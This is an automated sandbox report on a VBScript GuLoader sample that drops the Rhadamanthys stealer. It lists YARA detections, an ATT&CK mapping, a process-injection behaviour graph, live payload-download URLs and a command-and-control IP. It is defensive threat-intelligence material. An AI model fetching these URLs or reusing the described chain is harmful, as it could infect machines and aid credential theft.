                        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2340047272.00000000227E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                        Remote Access Functionality

                        barindex
                        Yara detected RHADAMANTHYS Stealer
                        Source: Yara matchFile source: 00000014.00000003.2328880762.0000000000B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2319358464.00000000027C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000013.00000003.2340047272.00000000227E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\SysWOW64\svchost.exeCode function: 20_2_04D7AB70 socket,WSAGetLastError,SetHandleInformation,GetLastError,closesocket,bind,WSAGetLastError,20_2_04D7AB70

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information211
                        Scripting                        		Valid Accounts111
                        Windows Management Instrumentation                        		211
                        Scripting                        		411
                        Process Injection                        		11
                        Masquerading                        		21
                        Input Capture                        		231
                        Security Software Discovery                        		Remote Services21
                        Input Capture                        		11
                        Encrypted Channel                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts2
                        Command and Scripting Interpreter                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		151
                        Virtualization/Sandbox Evasion                        		LSASS Memory1
                        Process Discovery                        		Remote Desktop Protocol1
                        Archive Collected Data                        		1
                        Non-Standard Port                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Exploitation for Client Execution                        		Logon Script (Windows)1
                        Extra Window Memory Injection                        		411
                        Process Injection                        		Security Account Manager151
                        Virtualization/Sandbox Evasion                        		SMB/Windows Admin SharesData from Network Shared Drive2
                        Ingress Tool Transfer                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts2
                        PowerShell                        		Login HookLogin Hook1
                        Obfuscated Files or Information                        		NTDS1
                        Application Window Discovery                        		Distributed Component Object ModelInput Capture2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Software Packing                        		LSA Secrets1
                        File and Directory Discovery                        		SSHKeylogging13
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        DLL Side-Loading                        		Cached Domain Credentials224
                        System Information Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        Extra Window Memory Injection                        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578231 Sample: YinLHGpoX4.vbs Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 51 www.tdejb.com 2->51 53 www.ftsengineers.com 2->53 55 8 other IPs or domains 2->55 67 Malicious sample detected (through community Yara rule) 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 Yara detected RHADAMANTHYS Stealer 2->71 73 9 other signatures 2->73 10 wscript.exe 1 2->10         started        13 powershell.exe 15 2->13         started        15 svchost.exe 2->15         started        signatures3 process4 dnsIp5 81 VBScript performs obfuscated calls to suspicious functions 10->81 83 Suspicious powershell command line found 10->83 85 Wscript starts Powershell (via cmd or directly) 10->85 95 2 other signatures 10->95 18 powershell.exe 20 19 10->18         started        87 Early bird code injection technique detected 13->87 89 Writes to foreign memory regions 13->89 91 Found suspicious powershell code related to unpacking or dynamic code loading 13->91 93 Queues an APC in another process (thread injection) 13->93 23 msiexec.exe 13->23         started        25 conhost.exe 13->25         started        65 127.0.0.1 unknown unknown 15->65 signatures6 process7 dnsIp8 57 ftsengineers.com 103.53.42.63, 443, 49739 PUBLIC-DOMAIN-REGISTRYUS India 18->57 59 astenterprises.com.pk 107.161.23.150, 443, 49730 RAMNODEUS United States 18->59 47 C:\Users\Public\pqg5u7vt.doc, Composite 18->47 dropped 49 C:\Users\Public\k9o5xs1hnem9ja8a.vbs, ASCII 18->49 dropped 75 Found suspicious powershell code related to unpacking or dynamic code loading 18->75 27 wscript.exe 1 18->27         started        30 WINWORD.EXE 180 445 18->30         started        32 conhost.exe 18->32         started        77 Switches to a custom stack to bypass stack traces 23->77 34 svchost.exe 23->34         started        file9 signatures10 process11 dnsIp12 97 Suspicious powershell command line found 27->97 99 Wscript starts Powershell (via cmd or directly) 27->99 37 WMIC.exe 1 27->37         started        40 powershell.exe 18 27->40         started        61 45.149.241.141, 2023, 49830, 49856 UUNETUS Germany 34->61 101 System process connects to network (likely due to code injection or exploit) 34->101 103 Switches to a custom stack to bypass stack traces 34->103 signatures13 process14 dnsIp15 79 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 37->79 43 conhost.exe 37->43         started        63 tdejb.com 202.71.109.228, 443, 49732, 49754 TMVADS-APTM-VADSDCHostingMY Malaysia 40->63 45 conhost.exe 40->45         started        signatures16 process17

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        YinLHGpoX4.vbs13%ReversingLabsScript-WScript.Trojan.GuLoader

                        Dropped Files

                        No Antivirus matches

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://ftsengineers.com0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.binLocksHydwww.tequila.ae/ab/ab.bin0%Avira URL Cloudsafe
                        http://www.ftsengineers.com0%Avira URL Cloudsafe
                        http://www.tdejb.com0%Avira URL Cloudsafe
                        https://www.astenterprises.com.pk/lm/lm.vbs0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.bin0%Avira URL Cloudsafe
                        https://www.ftsengineers.com0%Avira URL Cloudsafe
                        https://www.ftsengineers.com/lm/List0%Avira URL Cloudsafe
                        https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doc0%Avira URL Cloudsafe
                        http://tdejb.com0%Avira URL Cloudsafe
                        https://www.tdejb.com/ab/ab.binl=0%Avira URL Cloudsafe
                        https://www.tdejb.com/d&F0%Avira URL Cloudsafe
                        http://crl.microsq0%Avira URL Cloudsafe
                        https://www.tdejb.com/r&40%Avira URL Cloudsafe
                        https://www.ftsengineers.com/km/Reissuer.xsn0%Avira URL Cloudsafe
                        https://www.tdejb.com0%Avira URL Cloudsafe
                        https://www.tdejb.com/kp/Reissuer.xsn0%Avira URL Cloudsafe
                        https://www.ftsengineers.com/km/Reissuer.xsnH0%Avira URL Cloudsafe

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        bg.microsoft.map.fastly.net
                        		199.232.214.172
                        		truefalse
                          		high
                          astenterprises.com.pk
                          		107.161.23.150
                          		truefalse
                            		high
                            tdejb.com
                            		202.71.109.228
                            		truefalse
                              		unknown
                              default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                              		217.20.58.99
                              		truefalse
                                		high
                                ftsengineers.com
                                		103.53.42.63
                                		truetrue
                                  		unknown
                                  www.ftsengineers.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.astenterprises.com.pk
                                    		unknown
                                    		unknownfalse
                                      		high
                                      www.tdejb.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        https://www.tdejb.com/ab/ab.binfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.ftsengineers.com/lm/List%20of%20required%20items%20and%20services.doctrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.astenterprises.com.pk/lm/lm.vbstrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.tdejb.com/kp/Reissuer.xsnfalse
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.ftsengineers.compowershell.exe, 00000001.00000002.3013170685.00000295819B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.3128087900.00000295901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3013170685.0000029581A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3128087900.0000029590082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.tdejb.compowershell.exe, 00000006.00000002.1959985428.000001D295610000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://www.tdejb.com/ab/ab.binLocksHydwww.tequila.ae/ab/ab.binmsiexec.exe, 00000013.00000002.2366451436.0000000021F20000.00000004.00001000.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://go.micropowershell.exe, 00000001.00000002.3013170685.0000029580C2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D29457B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://tdejb.compowershell.exe, 00000006.00000002.1959985428.000001D295610000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.ftsengineers.com/lm/Listpowershell.exe, 00000001.00000002.3013170685.000002958161C000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.ftsengineers.compowershell.exe, 00000001.00000002.3013170685.000002958161C000.00000004.00000800.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://contoso.com/Licensepowershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ftsengineers.compowershell.exe, 00000001.00000002.3013170685.00000295819B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://contoso.com/Iconpowershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://cloudflare-dns.com/dns-querysvchost.exefalse
                                                      		high
                                                      http://crl.ver)svchost.exe, 0000000F.00000002.3027338456.0000017D1B600000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 0000000F.00000003.2097026765.0000017D1B8A3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.tdejb.com/d&Fmsiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.3013170685.00000295815EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.tdejb.com/r&4msiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://g.live.com/odclientsettings/Prod.C:svchost.exe, 0000000F.00000003.2097026765.0000017D1B91A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2097026765.0000017D1B80E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://astenterprises.com.pkpowershell.exe, 00000001.00000002.3013170685.00000295815EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://g.live.com/odclientsettings/ProdV2svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.astenterprises.com.pkpowershell.exe, 00000001.00000002.3013170685.0000029580C2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.tdejb.com/ab/ab.binl=msiexec.exe, 00000013.00000002.2349092290.0000000006FEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://crl.micropowershell.exe, 0000000B.00000002.2154114579.0000000002F1C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aka.ms/pscore6lBpowershell.exe, 0000000B.00000002.2160894575.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crl.microsqpowershell.exe, 00000001.00000002.3150059195.00000295EFE85000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://contoso.com/powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3128087900.00000295901B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3013170685.0000029581A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3128087900.0000029590082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1989249528.000001D2A3A26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.ftsengineers.com/km/Reissuer.xsnHpowershell.exe, 0000000B.00000002.2160894575.0000000004D15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.3013170685.0000029580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D2939B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.3013170685.0000029580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D2939B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160894575.0000000004BC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.ftsengineers.com/km/Reissuer.xsnpowershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D294F7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.tdejb.compowershell.exe, 00000006.00000002.1959985428.000001D293BD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1959985428.000001D294F7B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6svchost.exe, 0000000F.00000003.2097026765.0000017D1B8C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      107.161.23.150
                                                                                      		astenterprises.com.pkUnited States
                                                                                      		3842RAMNODEUSfalse
                                                                                      103.53.42.63
                                                                                      		ftsengineers.comIndia
                                                                                      		394695PUBLIC-DOMAIN-REGISTRYUStrue
                                                                                      45.149.241.141
                                                                                      		unknownGermany
                                                                                      		701UUNETUStrue
                                                                                      202.71.109.228
                                                                                      		tdejb.comMalaysia
                                                                                      		17971TMVADS-APTM-VADSDCHostingMYfalse

                                                                                      Private

                                                                                      IP
                                                                                      127.0.0.1

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1578231
                                                                                      Start date and time:2024-12-19 12:49:47 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 42s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:22
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:YinLHGpoX4.vbs
                                                                                      renamed because original name is a hash value
                                                                                      Original Sample Name:4229e57e86a1cf7074841b4a3020b8d9c7c9e8024de9d4b31cea02b3c1879b3c.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.expl.evad.winVBS@22/247@3/5
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 20%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 71%
                                                                                      • Number of executed functions: 83
                                                                                      • Number of non-executed functions: 30
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.109.28.46, 52.113.194.132, 52.109.76.243, 92.122.16.236, 52.111.252.16, 52.111.252.17, 52.111.252.18, 52.111.252.15, 13.69.116.107, 2.17.100.210, 2.17.100.200, 23.32.239.26, 23.32.239.17, 2.19.198.19, 20.12.23.50, 20.190.177.149, 13.107.246.63
                                                                                      • Excluded domains from analysis (whitelisted): binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, neu-azsc-000.roaming.officeapps.live.com, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdweu09.westeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, prod-all.naturallanguageeditorservice.osi.office.net.akadns.net, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod-inc-resolver.naturallanguageeditorservice.osi.office.net.akadns.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.co
                                                                                      • Execution Graph export aborted for target msiexec.exe, PID 7256 because there are no executed function
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5568 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7592 because it is empty
                                                                                      • Execution Graph export aborted for target powershell.exe, PID 7968 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: YinLHGpoX4.vbs

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      06:50:46API Interceptor4828296x Sleep call for process: powershell.exe modified
                                                                                      06:50:50API Interceptor1x Sleep call for process: wscript.exe modified
                                                                                      06:50:51API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                      06:51:20API Interceptor2x Sleep call for process: svchost.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      45.149.241.1410iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                        List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                          g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                            List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                              payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                  ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                    107.161.23.150raEyjKggAf.ps1Get hashmaliciousUnknownBrowse
                                                                                                      F8HYX5HOgA.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                        gCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                          H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                            H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                              KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                  8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                                    R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                      2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                                        103.53.42.63v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                          List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                            S1a5ZF3ytp.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                              List of required items pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                List of required items and services pdf.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                  https://2itchyfeets.comGet hashmaliciousUnknownBrowse
                                                                                                                                    http://2itchyfeets.comGet hashmaliciousUnknownBrowse
                                                                                                                                      Linux_x86Get hashmaliciousUnknownBrowse
                                                                                                                                        202.71.109.2280iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                          List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                            g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                              List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                  List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                    ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                      DOC-MARIANO _ 21ST_JUNE_2022 _.HTMGet hashmaliciousHTMLPhisherBrowse

                                                                                                                                                        Domains

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comgCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 217.20.58.99
                                                                                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 84.201.212.68
                                                                                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 217.20.58.100
                                                                                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 217.20.58.100
                                                                                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 84.201.211.18
                                                                                                                                                        v4BET4inNV.vbsGet hashmaliciousGuLoaderBrowse
                                                                                                                                                        • 217.20.58.101
                                                                                                                                                        FjfZ7uM8zh.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 217.20.58.100
                                                                                                                                                        t5lpvahkgypd7wy.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 217.20.58.98
                                                                                                                                                        update0.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                                                        • 217.20.58.100
                                                                                                                                                        A file has been sent to you via DROPBOX.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 217.20.58.100
                                                                                                                                                        bg.microsoft.map.fastly.netgCXzb0K8Ci.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.210.172
                                                                                                                                                        H2PspQWoHE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.214.172
                                                                                                                                                        H6epOhxoPY.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.210.172
                                                                                                                                                        KcKtHBkskI.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.214.172
                                                                                                                                                        1M1QoJF40r.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.210.172
                                                                                                                                                        StGx54oFh6.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                        • 199.232.214.172
                                                                                                                                                        8iAcoQLc3o.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.214.172
                                                                                                                                                        R7FBVcp1tf.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.210.172
                                                                                                                                                        2rTi9MgX25.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                        • 199.232.210.172
                                                                                                                                                        LFLtlBAuf7.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                        • 199.232.210.172

                                                                                                                                                        ASNs

                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                        TMVADS-APTM-VADSDCHostingMY0iTxQouy7k.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        List of required items and services.pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        g8ix97hz.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        List of required items and services pdf.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                                                                                                                                        • 202.71.109.228
                                                                                                                                                        bin.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                        • 202.75.62.165
                                                                                                                                                        OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
